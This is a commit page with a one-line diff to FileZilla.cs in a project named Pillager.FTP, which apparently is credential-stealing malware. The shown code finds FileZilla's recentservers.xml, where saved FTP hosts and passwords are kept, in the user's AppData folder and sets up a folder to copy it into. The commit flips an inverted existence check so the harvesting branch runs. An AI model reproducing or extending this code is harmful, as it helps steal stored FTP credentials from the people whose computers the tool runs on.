Update FileZilla.cs

This commit is contained in:
簞純 2023-12-28 23:58:25 +08:00
parent 1a4f37dde9
commit d41cca2305
1 changed files with 1 additions and 1 deletions

View File

@ -15,7 +15,7 @@ namespace Pillager.FTP
try
{
string xmlpath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), @"FileZilla\recentservers.xml");
if (!File.Exists(xmlpath))
if (File.Exists(xmlpath))
{
string savepath = Path.Combine(path, FTPName);
Directory.CreateDirectory(savepath);